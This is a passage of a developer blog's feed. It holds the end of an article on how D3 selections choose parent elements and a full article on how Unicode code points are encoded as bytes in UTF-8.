punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;join&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;circle&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cx&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;x&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cy&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;y&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;r&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;r&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;data-id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;the-missing-circle&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Given our new knowledge of how D3 sets a parent, and this code, where will the &lt;code&gt;&amp;lt;circle&amp;gt;&lt;/code&gt; end up?&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;🔎 This code has been run on this page. You can investigate the DOM in your browser&#39;s development tools and search for &lt;code&gt;the-missing-circle&lt;/code&gt; if you want to double-check your thinking, or if you don&#39;t believe me.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot;&gt;
import * as d3 from &quot;https://cdn.jsdelivr.net/npm/d3@7/+esm&quot;;

const data = [{ x: 100, y: 100, r: 25 }];

d3.select(&quot;svg&quot;)
  .select(&quot;circle&quot;)
  .data(data)
  .join(&quot;circle&quot;)
  .attr(&quot;cx&quot;, d =&gt; d.x)
  .attr(&quot;cy&quot;, d =&gt; d.y)
  .attr(&quot;r&quot;,  d =&gt; d.r)
  .attr(&quot;data-id&quot;, &quot;the-missing-circle&quot;)
&lt;/script&gt;
&lt;p&gt;The answer is the &lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt; element. We can break down why:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The initial &lt;code&gt;d3.select(&amp;quot;svg&amp;quot;)&lt;/code&gt; creates a selection with a single group, with its parent set to the &lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt; element.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;.select(&amp;quot;circle&amp;quot;)&lt;/code&gt; creates a new, empty selection that inherits the &lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt; parent.&lt;/li&gt;
&lt;li&gt;We bind the data to the selection, creating an enter selection as there is no corresponding &lt;code&gt;&amp;lt;circle&amp;gt;&lt;/code&gt; element for the data.&lt;/li&gt;
&lt;li&gt;When the &lt;code&gt;join&lt;/code&gt; method invokes the &lt;code&gt;enter&lt;/code&gt; callback, D3 appends a &lt;code&gt;&amp;lt;circle&amp;gt;&lt;/code&gt; to the parent element: &lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In contrast, &lt;code&gt;selection.selectAll()&lt;/code&gt; creates a new selection where each group&#39;s parent is the element from the original selection. When you perform a data join, D3 knows to append the new elements as children of these specific group parents (e.g., appending &lt;code&gt;&amp;lt;td&amp;gt;&lt;/code&gt;&#39;s inside a &lt;code&gt;&amp;lt;tr&amp;gt;&lt;/code&gt;). While you &lt;em&gt;could&lt;/em&gt; contort the D3 API enough that a &lt;code&gt;select&lt;/code&gt; would have a parent where something would display inside the DOM, it would never end up being quite the right parent.&lt;/p&gt;
&lt;h2 id=&quot;joining-the-d3-enlightened&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/understanding-d3-selections/#joining-the-d3-enlightened&quot;&gt;Joining the D3 Enlightened&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We&#39;ve explored why D3 exists in the first place, and how the data join is central to its magic. By binding data across three states - enter, update and exit - we gain a powerful general API to work with data in the DOM.&lt;/p&gt;
&lt;p&gt;We&#39;ll create one final visualisation to cement everything together. In the below grid, we bind to data of randomly select squares on an infinitely repeating timer. We use the data join to bring it to life in the DOM. Squares from the enter selection appear from &lt;span style=&quot;color:var(--flax)&quot;&gt;yellow&lt;/span&gt;, the update selection pulses &lt;span style=&quot;color:var(--aquamarine)&quot;&gt;green&lt;/span&gt; and the exit selection shrinks to &lt;span style=&quot;color:var(--bright-pink-crayola)&quot;&gt;red&lt;/span&gt;.&lt;/p&gt;
&lt;general-update-grid class=&quot;breakout&quot;&gt;
&lt;/general-update-grid&gt;
&lt;p&gt;With the power of D3 comes quite a low-level focus. There are certainly easier ways to make attractive basic charts - one of the D3 team&#39;s other projects, &lt;a href=&quot;https://observablehq.com/plot/&quot;&gt;Plot&lt;/a&gt;, does just that.&lt;/p&gt;
&lt;p&gt;And yet, I argue understanding D3 from a slightly lower level is a great way to appreciate it more thoroughly, and I also find if you don&#39;t come from a statistical background it helps appreciate that, too.&lt;/p&gt;
&lt;p&gt;Not to mention you&#39;ll be able to correct the LLM when it makes the occasional mistake with the chart you just asked it to make. Here&#39;s to investigating with data!&lt;/p&gt;
&lt;p&gt;Further Reading:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://d3js.org/what-is-d3&quot;&gt;What is D3?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://bost.ocks.org/mike/join/&quot;&gt;Thinking with Joins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://bost.ocks.org/mike/selection/&quot;&gt;How Selections Work&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class=&quot;card&quot;&gt;
  &lt;form action=&quot;https://buttondown.com/api/emails/embed-subscribe/martingaston&quot; method=&quot;post&quot; target=&quot;popupwindow&quot; onsubmit=&quot;window.open(&#39;https://buttondown.com/martingaston&#39;, &#39;popupwindow&#39;)&quot; class=&quot;embeddable-buttondown-form&quot;&gt;
    &lt;div class=&quot;card__header&quot;&gt;
      &lt;h2 class=&quot;card__title&quot;&gt;Enjoyed this?
      &lt;p class=&quot;card__description&quot;&gt;Get a little inbox treat when new articles are published. No spam, obv.&lt;/p&gt;
    &lt;/h2&gt;&lt;/div&gt;
&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;card__content&quot;&gt;
&lt;label class=&quot;card__content--highlight&quot; for=&quot;bd-email&quot;&gt;Email&lt;/label&gt;
&lt;input class=&quot;card__content--input&quot; placeholder=&quot;another@newsletter.com&quot; type=&quot;email&quot; name=&quot;email&quot; id=&quot;bd-email&quot; /&gt;
&lt;/div&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;card__footer&quot;&gt;
&lt;input class=&quot;card__button&quot; type=&quot;submit&quot; value=&quot;Subscribe&quot; /&gt;
&lt;/div&gt;&lt;p&gt;&lt;/p&gt;
  &lt;/form&gt;
&lt;/aside&gt;
</content>
  </entry>
  <entry>
    <title>The Magic of UTF-8: How Computers Understand Text</title>
    <link href="https://martingaston.dev/articles/the-magic-of-utf8/"/>
    <updated>2025-01-01T00:00:00Z</updated>
    <id>https://martingaston.dev/articles/the-magic-of-utf8/</id>
    <content xml:lang="en" type="html">&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/the-magic-of-utf8/components/textToUTF8.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/the-magic-of-utf8/components/randomCodePoints.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/the-magic-of-utf8/components/bitDistribution.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/the-magic-of-utf8/components/bmp.js&quot;&gt;&lt;/script&gt;
&lt;p&gt;&lt;noscript&gt;This blog post has lots of interactive elements with JavaScript&lt;/noscript&gt;&lt;/p&gt;
&lt;p&gt;If computers are just ones and zeroes, how are you reading this? Computers don&#39;t understand letters. Everything you read on these life-cursing devices has been turned into numbers.&lt;/p&gt;
&lt;p&gt;Let&#39;s think about how this works. Imagine you want to write me a message, but we&#39;ve agreed to communicate only via (hexadecimal) numbers. We decide to map letters to numbers. After much deliberation, we agree &lt;code&gt;41&lt;/code&gt;&lt;sup class=&quot;footnote-ref&quot;&gt;&lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fn1&quot; id=&quot;fnref1&quot;&gt;[1]&lt;/a&gt;&lt;/sup&gt; will represent &lt;code&gt;A&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In the real world, we can spit this into a &lt;code&gt;.txt&lt;/code&gt; file and observe the results:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token builtin class-name&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&#39;&#92;x41&#39;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; lovely-message.txt&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;cat&lt;/span&gt; lovely-message.txt&lt;br /&gt;A%&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It works! That&#39;s because most computers already interpret &lt;code&gt;0x41&lt;/code&gt; as &lt;code&gt;A&lt;/code&gt; due to &lt;a href=&quot;https://www.unicode.org/&quot;&gt;Unicode&lt;/a&gt;, the world&#39;s de facto text encoding standard in 2025.&lt;/p&gt;
&lt;p&gt;Numbers go in, letters come out. We can also work in the other direction:&lt;/p&gt;
&lt;p&gt;&lt;text-to-utf8&gt;&lt;/text-to-utf8&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The box above is interactive, so play around with various characters and see if you can find some interesting results. Some ideas:
 &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;English text (&lt;code&gt;Hello, World!&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Uppercase and lowercase characters (look at how &lt;code&gt;HeLlO wOrLd&lt;/code&gt; is different to &lt;code&gt;hElLo WoRlD&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Non-English text, e.g. Japanese (&lt;code&gt;こんにちは世界&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Emoji (👋🌍)&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;Unicode is a successful standard because it solves the problem of everyone having to agree on &lt;em&gt;what&lt;/em&gt; characters should become &lt;em&gt;what&lt;/em&gt; numbers. Yes, this used to be a big problem. But it also triggers its own follow-up questions, such as: why does &lt;code&gt;A&lt;/code&gt; get converted into a single number (&lt;code&gt;0x41&lt;/code&gt;) but &lt;code&gt;À&lt;/code&gt; ends up as two (&lt;code&gt;0xC3 0x80&lt;/code&gt;)? And how come we can squidge all of &lt;code&gt;Hello, World!&lt;/code&gt; into 17 bytes, but a single &lt;code&gt;👩🏽‍🏫&lt;/code&gt; emoji takes up 15 bytes&lt;sup class=&quot;footnote-ref&quot;&gt;&lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fn2&quot; id=&quot;fnref2&quot;&gt;[2]&lt;/a&gt;&lt;/sup&gt; just by itself?&lt;/p&gt;
&lt;p&gt;We&#39;ll get to it.&lt;/p&gt;
&lt;h2 id=&quot;one-giant-dictionary&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#one-giant-dictionary&quot;&gt;One Giant Dictionary&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Let&#39;s start with what Unicode calls a code point, which at its most straightforward represents a single character in the overall Unicode space. Code points are the core building blocks of Unicode, and conceptually represent the letters, numbers and punctuation of most of the world&#39;s languages.&lt;/p&gt;
&lt;p&gt;Unicode has been designed to be big. To feel the breadth of all this, play with this randomised display of code points from just 0.08% of the overall Unicode space:&lt;/p&gt;
&lt;p&gt;&lt;random-code-points&gt;&lt;/random-code-points&gt;&lt;/p&gt;
&lt;p&gt;You&#39;ll notice the characters above have all been rendered as glyphs: as in, you&#39;re &lt;em&gt;looking&lt;/em&gt; at them. Unicode does not actually concern itself with how things are displayed. Some code points aren&#39;t even &lt;em&gt;designed&lt;/em&gt; to be &#39;seen&#39; in the way that a typical user would expect. Other things you might see on your screen come from smooshing &lt;em&gt;two&lt;/em&gt; (or more) code points together: the Union Jack flag is actually &lt;em&gt;both&lt;/em&gt; &lt;code&gt;U+1F1EC&lt;/code&gt; and &lt;code&gt;U+1F1E7&lt;/code&gt;, which will display as 🇬 and 🇧 when separate but 🇬🇧 when adjacent.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The Unicode spec handily defines what you or I &lt;em&gt;expect&lt;/em&gt; to be a single character as a &lt;em&gt;user-perceived character&lt;/em&gt;, because the term &#39;character&#39; is massively overloaded. The formal way of defining a user-percieved character in Unicode is a &lt;em&gt;grapheme cluster&lt;/em&gt;, which is a term we&#39;ll start using. By this point you&#39;re pretty deep into the annexes of specification: you&#39;re looking for &lt;a href=&quot;https://www.unicode.org/reports/tr29/tr29-45.html&quot;&gt;UAX #29&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;1,114,112 possible code points are available&lt;sup class=&quot;footnote-ref&quot;&gt;&lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fn3&quot; id=&quot;fnref3&quot;&gt;[3]&lt;/a&gt;&lt;/sup&gt;, of which 154,998 have been used as of &lt;a href=&quot;https://www.unicode.org/versions/Unicode16.0.0/&quot;&gt;Unicode version 16.0&lt;/a&gt;. Unicode partitions its space into seventeen planes numbered 0 through 16, with each plane supporting 65,536 code points. Plane 0 is known as the Basic Multilingual Plane (BMP), and contains the majority of our languages. Planes 1 through 16 are defined as the Supplementary Planes. 10 of the supplementary planes are currently completely unused.&lt;/p&gt;
&lt;p&gt;If you&#39;re reading this, it&#39;s likely most characters you&#39;ll encounter on a day-to-day basis feature in the Basic Multilingual Plane. The basic Latin character set used for the English language is nestled right near the start of the BMP. In fact, &lt;code&gt;0x41&lt;/code&gt; to &lt;code&gt;A&lt;/code&gt; actually originally came from the formerly dominant ASCII standard, which was mostly fine if you were looking to encode English and a pain if you weren&#39;t. In order to smooth overall adoption when it came to rolling out Unicode, ASCII&#39;s encodings became a subset of Unicode: &lt;code&gt;0x41&lt;/code&gt; in ASCII is &lt;code&gt;U+0041&lt;/code&gt; in Unicode. This was a smart design decision.&lt;/p&gt;
&lt;p&gt;The problem with ASCII, it turned out, was there was &lt;em&gt;so much language&lt;/em&gt; outside of the limits of what it could recognise: its 7-bit space maxed out a meagre 128 characters. Comprehending the sheer amount of work and effort to accommodate all of the planet&#39;s languages can actually be particularly tricky for native English speakers (typers?) to wrap their heads around, mostly because we&#39;ve never had to actively think about it for the majority of our computing lives: ASCII was literally built just for us.&lt;/p&gt;
&lt;p&gt;If you visualise &lt;em&gt;just the basic multilingual plane&lt;/em&gt; you can isolate the non-control characters of the ASCII block to see just how small it is in the overall space:&lt;/p&gt;
&lt;p&gt;&lt;bmp-tree&gt;&lt;/bmp-tree&gt;&lt;/p&gt;
&lt;p&gt;So, to be specific, one or more Unicode code points defines the grapheme cluster &lt;em&gt;representation&lt;/em&gt; of what the user percieves as a character, and its glyph is how it &lt;em&gt;looks&lt;/em&gt; on their screen. A grapheme cluster could be &lt;code&gt;A&lt;/code&gt; or &lt;code&gt;é&lt;/code&gt; or even &lt;code&gt;👩‍🚀&lt;/code&gt;. It might seem somewhat obvious but it&#39;s worth hammering that home: the glyphs for &lt;span style=&quot;font-family: &amp;quot;Comic Sans MS&amp;quot;, sans-serif; color: var(--aquamarine)&quot;&gt;hello&lt;/span&gt; can look different when rendered with &lt;span style=&quot;font-family: &amp;quot;Comic Sans MS&amp;quot;, sans-serif; color: var(--aquamarine)&quot;&gt;a sans-serif font&lt;/span&gt; than when &lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;, serif; color: var(--amaranth-pink)&quot;&gt;hello&lt;/span&gt; is rendered with a &lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;, serif; color: var(--amaranth-pink)&quot;&gt;serif&lt;/span&gt; one.&lt;/p&gt;
&lt;h2 id=&quot;onward%2C-to-bytes!&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#onward%2C-to-bytes!&quot;&gt;Onward, to Bytes!&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The next step is to take those code points and encode them into sequences of bytes, so we can do things like save them as documents or send them down internet pipes. Unicode code points can be encoded in three delicious flavours: UTF-32, UTF-16 and UTF-8. Which one should you use?&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Spoiler: it&#39;s UTF-8.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;UTF-8, UTF-16 and UTF-32 are named based on the &lt;em&gt;minimum&lt;/em&gt; amount of bits needed to encode code point: 8, 16 or 32, respectively. This means UTF-32 is theoretically the simplest, as every single code point uses exactly four bytes, but also the most space inefficient. Do not also be lulled into a false sense of security that UTF-32 is guaranteed to be straightforward, as we&#39;ve already seen that code points do not have a 1:1 mapping with what&#39;s displayed on the screen due to grapheme clusters - remember &lt;code&gt;🇬🇧&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;Due to its ASCII heritage&lt;sup class=&quot;footnote-ref&quot;&gt;&lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fn4&quot; id=&quot;fnref4&quot;&gt;[4]&lt;/a&gt;&lt;/sup&gt; and position at the very beginning of the code space, Basic Latin characters don&#39;t need more than one byte to be encoded. Both UTF-16 and UTF-8 are variable in their length, with UTF-16 being two bytes for anything in the Basic Multilingual Plane and four bytes for everything else. UTF-16 can be the most space efficient for some Asian languages. UTF-8 goes even further, and encodes characters between one and four bytes.&lt;/p&gt;
&lt;p&gt;Anyway, fast forward a couple of decades and &lt;a href=&quot;https://utf8everywhere.org/&quot;&gt;UTF-8 emerged as the clear favourite&lt;/a&gt;. 98% of websites now use UTF-8. Due to the success of UTF-8 and its ubiquity, most of us can go about our days without having to contemplate it in the slightest. I&#39;m going to totally gloss over UTF-16 and UTF-32 for the rest of this article, which at least saves a discussion about endianness, and I can do this so flippantly exactly because UTF-8 is so popular.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Fun fact: JavaScript encodes strings as UTF-16. This isn&#39;t meant as some kind of &#39;lol JavaScript&#39; remark, I just think it&#39;s interesting.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Onto the actual encoding itself. UTF-8 is a variable-width encoding, so the amount of bytes you&#39;ll need depends on the code point you&#39;re looking to encode:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Required Bytes&lt;/th&gt;
&lt;th&gt;Start Code Point&lt;/th&gt;
&lt;th&gt;End Code Point&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;U+0000&lt;/td&gt;
&lt;td&gt;U+007F&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;U+0080&lt;/td&gt;
&lt;td&gt;U+07FF&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;U+0800&lt;/td&gt;
&lt;td&gt;U+FFFF&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;U+10000&lt;/td&gt;
&lt;td&gt;U+10FFFF&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;You can break it down like this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Single byte characters cover ASCII (0-127)&lt;/li&gt;
&lt;li&gt;Two byte characters cover most Latin-script alphabets and some other scripts&lt;/li&gt;
&lt;li&gt;Three byte characters cover the rest of the Basic Multilingual Plane (BMP)&lt;/li&gt;
&lt;li&gt;Four byte characters cover all supplementary planes, including emoji and rare historical scripts&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For an example, let&#39;s start with &lt;code&gt;U+1F602&lt;/code&gt;, more commonly identified as the &lt;code&gt;Face With Tears of Joy&lt;/code&gt; emoji. That code point will get encoded as four-bytes in UTF-8. In the buttons below you&#39;ll also see &lt;code&gt;읥&lt;/code&gt;, &lt;code&gt;Θ&lt;/code&gt; and &lt;code&gt;A&lt;/code&gt; - which are encoded as three, two and one byte, respectively.&lt;/p&gt;
&lt;p&gt;You&#39;ll also notice that some &lt;em&gt;extra&lt;/em&gt; bits sneak in. These clever little bits contain valuable additional information for anything decoding your UTF-8.&lt;/p&gt;
&lt;p&gt;&lt;utf8-bit-distribution&gt;&lt;/utf8-bit-distribution&gt;&lt;/p&gt;
&lt;p&gt;We start with the code point represented as binary - the &lt;code&gt;1F602&lt;/code&gt; in &lt;code&gt;U+1F602&lt;/code&gt; - and distribute those bits across the necessary amount of bytes as per the encoding rules. These are colour coded so you can see where they all end up. As for those other, weird &lt;em&gt;extra&lt;/em&gt; bits:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Two, three and four byte UTF-8 encodings start with two, three or four &lt;code&gt;1&lt;/code&gt;s, so that whatever ends up &lt;em&gt;decoding&lt;/em&gt; this knows how many bytes to read and parse. A one-byte encoding starts with a &lt;code&gt;0&lt;/code&gt; to ensure ASCII compatibility.&lt;/li&gt;
&lt;li&gt;The second, third or fourth bytes of a UTF-8 encoding start with &lt;code&gt;10&lt;/code&gt;, so you know that they&#39;re following on from something else. Notice how it&#39;s not possible for a valid &lt;em&gt;first&lt;/em&gt; byte to ever start with &lt;code&gt;10&lt;/code&gt;, which is very clever. If you&#39;re ever parsing UTF-8 and you stumble upon an unexpected byte starting with &lt;code&gt;10&lt;/code&gt;, you can know straight away that something&#39;s got jumbled up.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;wrapping-up&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#wrapping-up&quot;&gt;Wrapping Up&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Now we can come back to our question that we know doesn&#39;t have the most straightforward answer: why is &lt;code&gt;👩🏽‍🏫&lt;/code&gt; 15 bytes in UTF-8?&lt;/p&gt;
&lt;p&gt;We know what we&#39;re seeing visually is a glyph, and those will look different based on platform. Microsoft&#39;s FluentUI renders it as &lt;code&gt;&lt;img alt=&quot;Woman Teacher: Medium Skin Tone as interpreted by Microsoft&#39;s FluentUI&quot; src=&quot;https://martingaston.dev/articles/the-magic-of-utf8/woman_teacher_flat_medium.svg&quot; style=&quot;width: 1.5em; display: inline-block; vertical-align: middle&quot; /&gt;&lt;/code&gt;, for example, which may or may not look the same as the glyph above - depending on where you&#39;re viewing this.&lt;/p&gt;
&lt;p&gt;We also know that we should generally think in terms of grapheme clusters rather than individual code points, which is especially true for &lt;code&gt;Woman Teacher: Medium Skin Tone&lt;/code&gt;: the Unicode information which represents this single &#39;user-perceived&#39; character is made up of the following &lt;em&gt;four&lt;/em&gt; Unicode code points:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;👩 &lt;code&gt;U+1F469&lt;/code&gt;: The base emoji character for &amp;quot;Woman&amp;quot;&lt;/li&gt;
&lt;li&gt;🏽 &lt;code&gt;U+1F3FD&lt;/code&gt;: The modifier for &amp;quot;Medium Skin Tone&amp;quot;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;U+200D&lt;/code&gt;: The Zero Width Joiner (ZWJ), which makes it explicit that the previous code points are is connected to the next one, which might not be interpretable on its own. This one doesn&#39;t have its own glyph information associated with it on my version of macOS, either.&lt;/li&gt;
&lt;li&gt;🏫 &lt;code&gt;U+1F3EB&lt;/code&gt;: The emoji for &amp;quot;School&amp;quot;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Put that together, and the UTF-8 encoding for this one fabulous &lt;code&gt;👩🏽‍🏫&lt;/code&gt; emoji will end up as 15 bytes made up of &lt;code&gt;👩&lt;/code&gt; = &lt;code&gt;0xF0 0x9F 0x91 0xA9&lt;/code&gt;, &lt;code&gt;🏽&lt;/code&gt; = &lt;code&gt;0xF0 0x9F 0x8F 0xBD&lt;/code&gt;, &lt;code&gt;ZWJ&lt;/code&gt; = &lt;code&gt;0xE2 0x80 0x8D&lt;/code&gt; and &lt;code&gt;🏫&lt;/code&gt; = &lt;code&gt;0xF0 0x9F 0x8F 0xAB&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;UTF-8 is probably one of the most successful standards ever produced. This little journey has already taken us to some of the interesting spots, and hopefully made you appreciate what a fascinating accomplishment it is to have one globally-accepted standard to cover all of the world&#39;s languages.&lt;/p&gt;
&lt;aside class=&quot;card&quot;&gt;
  &lt;form action=&quot;https://buttondown.com/api/emails/embed-subscribe/martingaston&quot; method=&quot;post&quot; target=&quot;popupwindow&quot; onsubmit=&quot;window.open(&#39;https://buttondown.com/martingaston&#39;, &#39;popupwindow&#39;)&quot; class=&quot;embeddable-buttondown-form&quot;&gt;
    &lt;div class=&quot;card__header&quot;&gt;
      &lt;h2 class=&quot;card__title&quot;&gt;Enjoyed this?
      &lt;p class=&quot;card__description&quot;&gt;Get a little inbox treat when new articles are published. No spam, obv.&lt;/p&gt;
    &lt;/h2&gt;&lt;/div&gt;
&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;card__content&quot;&gt;
&lt;label class=&quot;card__content--highlight&quot; for=&quot;bd-email&quot;&gt;Email&lt;/label&gt;
&lt;input class=&quot;card__content--input&quot; placeholder=&quot;another@newsletter.com&quot; type=&quot;email&quot; name=&quot;email&quot; id=&quot;bd-email&quot; /&gt;
&lt;/div&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;card__footer&quot;&gt;
&lt;input class=&quot;card__button&quot; type=&quot;submit&quot; value=&quot;Subscribe&quot; /&gt;
&lt;/div&gt;&lt;p&gt;&lt;/p&gt;
  &lt;/form&gt;
&lt;/aside&gt;
&lt;hr class=&quot;footnotes-sep&quot; /&gt;
&lt;section class=&quot;footnotes&quot;&gt;
&lt;ol class=&quot;footnotes-list&quot;&gt;
&lt;li id=&quot;fn1&quot; class=&quot;footnote-item&quot;&gt;&lt;p&gt;That&#39;s &lt;code&gt;65&lt;/code&gt; in decimal, but we&#39;ll jump straight into hexadecimal because it&#39;s so commonplace when we start to go to the lower levels. I&#39;ll also refer to hexadecimal numbers with an &lt;code&gt;0x&lt;/code&gt; prefix going forward, so this would be &lt;code&gt;0x41&lt;/code&gt;. &lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fnref1&quot; class=&quot;footnote-backref&quot;&gt;↩︎&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
